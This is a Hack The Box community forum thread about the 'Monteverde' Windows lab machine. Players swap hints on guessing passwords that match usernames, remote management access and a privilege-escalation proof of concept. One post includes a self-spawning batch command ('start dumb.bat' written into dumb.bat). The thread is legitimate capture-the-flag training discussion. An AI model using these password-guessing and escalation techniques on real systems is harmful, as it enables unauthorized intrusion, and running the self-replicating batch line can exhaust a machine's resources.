Monteverde

1568101116

Comments

  • edited January 18

    found the Right local poc. ebil crashes when i run it. do i need to specify another port?

  • anyone can help me with guessing for the foothold i seems really not able to guess it out my head is burning

  • Finally rooted it.

    Huge thanks to @AXANO and @emmycat for nudges and guidance.

  • Type your comment> @imousrf said:

    anyone can help me with guessing for the foothold i seems really not able to guess it out my head is burning

    Just start with basic enum then take advantage of lazy users bad habits for password choice

    Hack The Box

  • Type your comment> @cyberafro said:

    Just start with basic enum then take advantage of lazy users bad habits for password choice

    just got it thanks to you and @sinanozdemir
    and yeah just basic and lazyy

  • i found a list of users but i cant login with any common passwords. I've tried guessing basic ones and some popular wordlists. what am i missing? can someone DM me a hint for the foothold?

  • @SirFIS said:

    i found a list of users but i cant login with any common passwords. I've tried guessing basic ones and some popular wordlists. what am i missing? can someone DM me a hint for the foothold?

    It is a little bit annoying but when you get this you will kick yourself. You have enough information right now and you even have a password, you just dont realise it yet.

    Take all the lists of information you have now and make a wordlist out of it.

    Then try that.

  • I have it and you're right @TazWake I am kicking myself for missing it.

  • Rooted. Feel free to PM me if you need a nudge :)

  • Just rooted.

    • user: no major skills are needed and hte overall process is very similar to many other boxes. Indeed, getting the first shell is all about the common admin laziness and the normal enumeration.

    • root: learned something new. Despite the fact that i'm really potato with ps and s**, eventually I discovered a new way to get the info I need.

    echo start dumb.bat > dumb.bat && dumb.bat
    doh!

  • Been sitting on user credentials for a few hours now.
    Struggling to move forward with them.

    Arrexel
    CCNA, CCNA SEC, SEC+

  • @gsxrjason said:

    Been sitting on user credentials for a few hours now.
    Struggling to move forward with them.

    Assuming you've got user.txt

    Enumerate what unusual thing your user account is part of and then google attacks against that thing.

    If you haven't got user.txt yet, there is an evil tool you can use to do remote management on windows machines.

  • Initial foothold was fun and can definitely be liked to a real world scenario. I think I've even been guilty of that once when I first started. Think what might not be in a wordlist, but also might be easily guessable!

    Really struggling with getting the POC to work for root however! If anyone wants to send me a nudge then you're more than welcome to :)

    skunk

    Happy to offer nudges to anyone on boxes I've done, provided you show that you've reasonably tried to understand what the goal is! If I do help, please consider giving respect!

  • edited January 20

    Struggling to get the PoC to work - if anyone can point me in the right direction that would be amazing, been sat on this for a couple of hours now with no luck

    Ignore! Worked it out by reading the instructions...

    PS C:\Users\Administrator\Desktop> whoami
    m......../administrator
    PS C:\Users\Administrator\Desktop> ls

    Directory: C:\Users\Administrator\Desktop
    

    Mode LastWriteTime Length Name
    ---- ------------- ------ ----
    -ar--- 1/3/2020 5:48 AM 32 root.txt

  • Finally rooted, thanks to @iSmarsh for the final hint about the ps script.

    Good box, googling don't be so confident to find the correct script. I lost time for this reason.

  • edited January 21

    Don't suppose anyone's having issues with this:

    CategoryInfo : ParserError: (:) [], ParseException
    FullyQualifiedErrorId : TerminatorExpectedAtEndOfString

    Re typed the script but still having issues.

    Rooted! Thanks to @BrokenGQ for pointing out how to fix the above error and others who sent me nudges!

    My inbox is open for anyone else who needs a hint, what a journey. Definitely my hardest root so far.

    skunk

    Happy to offer nudges to anyone on boxes I've done, provided you show that you've reasonably tried to understand what the goal is! If I do help, please consider giving respect!

  • fun box
    user was too easy for a medium box, if you are stuck think simple
    I couldn't spot the vulnerability for root at first, but once the hints on the forum were very useful and once you find the poc you only need to add one thing to connect.

    hit me up here or on discord if you need hints.

  • edited January 21

    Idk if i can't think simple or i'm using the wrong tools.

    I tried with lpch querys, krb*e (the user domain enumerations goes OK, but idk if the authentication can work), el-w***m with the most 'not-overthinking passwords' that i can think, and all this start with rclt but no luck after enumeration. I even did a s*bc***nt for wordslist bruteforcing with the users/groups enumerated at r**c****t but just no...

    Did is miss something?

  • Feel free to dm me for hints. I will respond fast. I loved this box there is a lot of real world value to it!

  • Type your comment> @Taulio said:

    Idk if i can't think simple or i'm using the wrong tools.

    I tried with lpch querys, krb*e (the user domain enumerations goes OK, but idk if the authentication can work), el-w***m with the most 'not-overthinking passwords' that i can think, and all this start with rclt but no luck after enumeration. I even did a s*bc***nt for wordslist bruteforcing with the users/groups enumerated at r**c****t but just no...

    Did is miss something?

    What's the laziest way of coming up with a password?

  • What's the laziest way of coming up with a password?
  • Spoiler Removed

  • Repetition is a lazy trait!

  • Get it. I was trying with the wrong users cause i missed the little 'response' things.
    Thanks.

    @CuriousJ @Reiahx01

  • edited January 22

    I have the users, the groups, domain etc. But either I'm using the wrong tool or I'm unable to guess this password . i have create a passwordlist of all thing in the enumeration. Tried domain name,username,group names

    what am i missing here

    EDIT:

    Found it. I was overthinking it. And to much focus on one part of the emuration. I also used the s*******t to connect.

  • now I'n having trouble escalating to an other user with the found creds. The evil will not connect?

    any nodge

  • Got user. Now enumerating for root. User is so simple that it is hard to take..

    t13nn3s

  • Very cool Windows box. Thx @egre55
    For foothold earlier in the topic there is an excellent article from OWASP. The next user is very simple, just enumerate .
    Root tip: there are several versions of the smb protocol if you need to copy something from your machine. And there is a ready-made exploit (with screenshots from HTB in article :) ) already in the form of an application that just works and gets the password.
    As usual, PM for hints.

  • edited January 24

    Thank you - @egre55

    Well that was a lesson learned on looking at lists and making sure you have everybody you need. I spent a lot of time trying everything without everyone being present.

    Respect has been given (hopefully) to everyone that gave me a little nudge.

    Confirming what AlexLTN said, root was very fast once you find the exploit to use.

  • Thanks for all your comments so far. Can someone give me a nudge regarding the Connection String. I can't really find a reference to any loc**db.
    Thanks!

    badge

Sign In to comment.